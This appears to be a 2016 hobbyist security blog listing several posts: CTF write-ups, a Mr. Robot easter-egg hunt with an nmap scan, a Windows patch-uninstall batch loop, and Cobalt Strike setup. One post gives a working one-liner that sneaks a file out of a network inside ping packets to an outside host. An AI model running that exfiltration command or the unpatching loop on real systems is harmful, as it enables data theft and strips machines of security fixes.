Posts

  1. IceCTF 2016 - Thor is a hacker now


    Challenge description:

    Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is?

    The text file provided is just a hexdump produced with xxd. xxd actually has a feature to reverse a hexdump back into the original file, from there I identified the resulting file's format with the file command. It was an lzip. Extracting the lzip resulted in the following image:

    thor

    Flag:

    IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}

    Commands that were run in order:

    → xxd -r thor.txt > thor.bin
    → file thor.bin
    thor.bin: lzip compressed data, version: 1
    lzip -d thor.bin
    → file thor.bin.out
    thor.bin.out: JPEG image data, JFIF standard 1.01
    → mv thor.bin.out thor.jpg
    
  2. IceCTF 2016 - Vape Nation


    Challenge description:

    Go Green!

    They provide a png called vape_nation.png:

    vape nation

    With the hint I figured it must be a green filter of some sort so I loaded up Stegsolve and checked out the green plane filters. Green plane 0 resulted in the following:

    solved nation

    Looks like a flag :)

    IceCTF{420_CuR35_c4NCEr}

  3. Mr. Robot Season 2 Episode 4 Easter Egg


    After seeing the last Mr. Robot easter egg from season 2 episode 1 I have been on the lookout for IP's and domains to try and go after. At the end of season 2 episode 4 (init_1.asec) Elliot logs into an IRC server and the IP address is clearly visible as 192.251.68.53. ip

    I decided to scan that host with nmap and got the following results:

    → sudo nmap -sS -Pn -sV -n 192.251.68.253
    Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-28 08:46 EDT
    Nmap scan report for 192.251.68.253
    Host is up (0.023s latency).
    Not shown: 996 filtered ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp?
    80/tcp   open  http-proxy  F5 BIG-IP load balancer http proxy
    554/tcp  open  rtsp?
    7070/tcp open  realserver?
    Service Info: Device: load balancer
    

    HTTP up, cool. I went to the site and it was a fake IRC server with the hostname irc.colo-solutions.net: irc

    After it logged me in as D0loresH4ze I was dropped in a channel called #th3g3ntl3man with the all too familiar samsepi0l (for the uninformed, Sam Sepiol was the alias Elliot used in season one to gain access to Steel Mountain, a secure datacenter).

    After poking around and trying to get samsepi0l to say something besides "i don't have time for this right now." I played the roll of Darlene and entered what she said in the show: input

    Here is the respone I got: response

    they have changed their standard issue. we have a way in.

    What does that even mean? At the end of the episode this line of dialogue was not shown. Only wait for my instructions was. The scene after shows a news article from Business Insider titled FBI gives up Blackberry for Android. I assume that is their "standard issue" and he is going to hack into them via their smartphones. That's a bold move, we'll see how it plays out next week.

    After this I investigated a couple of other addresses I found (192.251.68.240, 104.97.14.93, 192.251.68.249, irc.eversible.co) but none of them turned up anything. I looked at the page source too, hoping to find something hidden in the javascript or HTML. Nothing there either... I guess we will just have to wait and see where this goes! I'll probably take a closer look at this after work, but I thought this would be cool to share now.

  4. Metasploit Workflows and Scripting


    Here is a presentation I gave at GVSU on 7/20/16 about the basics of metasploit and automation using pymetasploit

    The code for autopsexec is not public right now because it is a mess. I'll update this post when I fix it!

  5. Data Exfiltration with Ping


    I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it. How to exfiltrate data from a network using the padding of ICMP echo request packets.

    Sending data

    base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done
    

    This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into ping.

    Obviously you should change the IP before sending :)

    Receiving data

    You can grab the data off the wire using scapy. Here's a short little script that takes an out file name as the first argument and then an optional interface name to listen on as the second argument.

    That's all for now.

  6. Hello World


    Finally finished this new blog. It's all static now so that's good.

    I was on wordpress before and it was terrible. Hopefully I can put some cool stuff here!

  7. iPhone: Installing apt without a gui


    Usually to get apt you need to launch Cydia. If you only have an ssh connection in and would like apt you can go to http://apt.saurik.com/debs/ and grab berkeleydb_4.6.21-5_iphoneos-arm.deb and apt7_0.7.25.3-8_iphoneos-arm.deb. Scp them over and run dpkg -i apt7_0.7.25.3-8_iphoneos-arm.deb then dpkg -i berkeleydb_4.6.21-5_iphoneos-arm.deb. There you go. You can apt-get all of the things now.

  8. Uninstall all installed windows KB patches in one line of batch


    I was trying to unpatch something to make it vulnerable and I was getting impatient trying to uninstall the correct patch so I got creative and came up with a one liner to uninstall all of them at once. Or at least all of the ones with working uninstallers and don't have other dependencies... The uninstallers are all called spuninst.exe and are somewhere in \\WINDOWS (under a bunch of sub folders that start with $NtUninstall) so I give you the following command:

    for /F %a in ('dir /B /S /A \\WINDOWS ^\| findstr spuninst.exe ^\| findstr NtUninstall') do @(echo %a && %a /quiet /norestart)
    

    Keep running this until it does not print anything and then all of the patches will be gone on reboot. Happy unpatching

    ... bonus

    for /L %b in (0,0,1) do @for /F %a in ('dir /B /S /A \\WINDOWS ^\| findstr spuninst.exe ^\| findstr NtUninstall') do @(echo %a && %a /quiet /norestart)
    

    Just keep running that until the screen is blank

  9. Cobalt Strike 2.4 on Kali 2.0


    Cobalt Strike 3.0 came out lacking metasploit integration. Also, Cobalt Strike 2.4 (grab that here if you need it) doesn't work with the version of Metasploit that is built into Kali 2.0. That's okay, because you can still compile the metasploit framework to work with Cobalt Strike 2.4.

    curl -sSL https://get.rvm.io \| bash -s stable
    source /usr/local/rvm/scripts/rvm
    apt-get install libpq-dev libpcap-dev
    service postgresql start
    msfconsole
    exit (this was to make sure the msf database was created)
    rvm install 1.9.3
    cd /usr/share
    git clone https://github.com/rapid7/metasploit-framework cs-msf
    cd cs-msf
    git checkout dc48987
    rvm use 1.9.3
    bundle install
    for i in msf*;do update-alternatives --install /usr/bin/$i $i $PWD/$i 1;done
    cd ../metasploit-framework
    for i in msf*;do update-alternatives --install /usr/bin/$i $i $PWD/$i 2;done
    rm -rf $(dirname $(which msfconsole))/msf*
    update-alternatives --config msfrpcd < <(echo 1)
    cp /usr/share/metasploit-framework/config/database.yml /usr/share/cs-msf/config
    export MSF_DATABASE_CONFIG=/usr/share/cs-msf/config/database.yml
    

    Then, edit the database.yml file @ /usr/share/cs-msf/config/database.yml:

    • Delete the &pgsql after development
    • Delete all profiles after development (after first line with nothing on it)
    • Change development to production (1st line)
    • Save the file
    You should now be able to run cobalt strike 2.4 just fine.

    To switch back just open a new terminal OR:

    update-alternatives --config msfrpcd < <(echo 0)
    rvm use system
    

    And the next time you want to use 2.4 (put this in a script):

    \#!/bin/bash
    source /usr/local/rvm/scripts/rvm
    rvm use 1.9.3
    update-alternatives --config msfrpcd < <(echo 1)
    export MSF_DATABASE_CONFIG=/usr/share/cs-msf/config/database.yml 
    ./cobaltstrike &>/dev/null &disown
    read -p "Press enter once the RPC server has started up..." i
    update-alternatives --config msfrpcd < <(echo 0)
    

    I'm pretty sure there is a more elegant way to do this rather than using update-alternatives... but this works for now. As a side note... tracking down the exact revision where ruby 2.1 became a dependency was terrible. Yes, this is the absolute LAST commit you can get and compile without ruby 2.1. I might update this with a solution for later versions of metasploit before the MsgPack library update (which breaks cobaltstrike much more than I'm willing to fix!).